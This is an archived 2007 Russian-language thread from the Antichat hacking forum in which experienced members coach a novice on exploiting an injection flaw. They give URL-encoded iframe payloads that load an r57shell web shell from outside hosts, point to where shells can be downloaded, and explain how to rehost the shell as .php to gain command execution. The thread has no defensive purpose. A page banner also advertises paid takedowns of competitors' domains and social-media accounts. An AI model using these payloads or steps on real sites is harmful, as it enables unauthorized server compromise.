Форум АНТИЧАТ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Xss->...

Страница 1 из 2

Опции темы

Поиск в этой теме

Опции просмотра

Xss->...

15.10.2007, 16:56

Qwertison

Познающий

Регистрация: 01.04.2007

Сообщений: 43

Провел на форуме:
297955

Репутация: -5

Xss->...

Есть уязвимость которая позволяет подставить

Код:

%3CIFRAME%20SRC=http://ha.ckers.org/scriptlet.html%20%3C

в запрос и выскочит окно с xss (точнее окно _http://ha.ckers.org/scriptlet.html) Что еще можно загрузить на эту страницу? (не вообще что только можно, а что-то полезное для себя

)

15.10.2007, 17:02

kair

Участник форума

Регистрация: 12.10.2006

Сообщений: 158

Провел на форуме:
668286

Репутация: 187

Отправить сообщение для kair с помощью ICQ

Цитата:

<SCRIPT LANGUAGE="JavaScript">alert('XSS')</SCRIPT>

может это инклуд а не xss!? xss исполняется на уязвимом сайте
если это инклуд ты можешь сделать так

%3CIFRAME%20SRC=http://ya.ru идолжен появится яндекс

или так
%3CIFRAME%20SRC=http://hack.net/r57shell.php

Последний раз редактировалось kair; 15.10.2007 в 17:07..

15.10.2007, 17:05

Qwertison

Познающий

Регистрация: 01.04.2007

Сообщений: 43

Провел на форуме:
297955

Репутация: -5

Код:

%3CIFRAME%20SRC=http://ya.ru%20%3C

яндекс появился))

Код:

%3CIFRAME%20SRC=http://hack.net/r57shell.php

- что это даст?

Последний раз редактировалось Qwertison; 15.10.2007 в 17:08..

15.10.2007, 17:08

kair

Участник форума

Регистрация: 12.10.2006

Сообщений: 158

Провел на форуме:
668286

Репутация: 187

значит это инклуд!!! подставляй вместо яндекса шелл

15.10.2007, 17:10

Qwertison

Познающий

Регистрация: 01.04.2007

Сообщений: 43

Провел на форуме:
297955

Репутация: -5

инклуд!!инклуд!!(что это такое?) шелла там нет где ты указал(

15.10.2007, 17:13

kair

Участник форума

Регистрация: 12.10.2006

Сообщений: 158

Провел на форуме:
668286

Репутация: 187

http://www.security-frog.org/hack/r57shell-inversa.txt
и выполняй команды
можешь взять любой шелл по адресу
https://forum.antichat.ru/thread20314.html

Последний раз редактировалось kair; 15.10.2007 в 17:18..

15.10.2007, 17:18

Qwertison

Познающий

Регистрация: 01.04.2007

Сообщений: 43

Провел на форуме:
297955

Репутация: -5

как команды выполнять? вылезло окошечко такое же как и на __http://www.security-frog.org/hack/r57shell-inversa.txt__ Всмысле текст тхт, нет меню как у залитого шелла...

15.10.2007, 17:19

kair

Участник форума

Регистрация: 12.10.2006

Сообщений: 158

Провел на форуме:
668286

Репутация: 187

вместо txt пиши php
%3CIFRAME%20SRC=http://www.security-frog.org/hack/r57shell-inversa.php

15.10.2007, 17:21

Qwertison

Познающий

Регистрация: 01.04.2007

Сообщений: 43

Провел на форуме:
297955

Репутация: -5

Error 404!

/hack/r57shell-inversa.php
File Not Found!

#10

15.10.2007, 17:55

delay(0)

Участник форума

Регистрация: 22.11.2006

Сообщений: 117

Провел на форуме:
1813343

Репутация: 141

Цитата:

Error 404!

/hack/r57shell-inversa.php
File Not Found!

Сохрани этот файл у себя на компе, переименуй в .php, загрузи на народ.ру и подставляй адрес до него.

Страница 1 из 2

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss-туннелинг: твой трафик в Xss канале	Mo4x	Чужие Статьи	6	19.07.2007 16:13
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
Xss для новичков	Micr0b	Уязвимости	0	04.06.2006 18:25
Продаю самые Красивые номера. Красивые 5,6 знаки.	Кирпич	ICQ - Покупка, продажа	3	09.04.2004 18:45

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход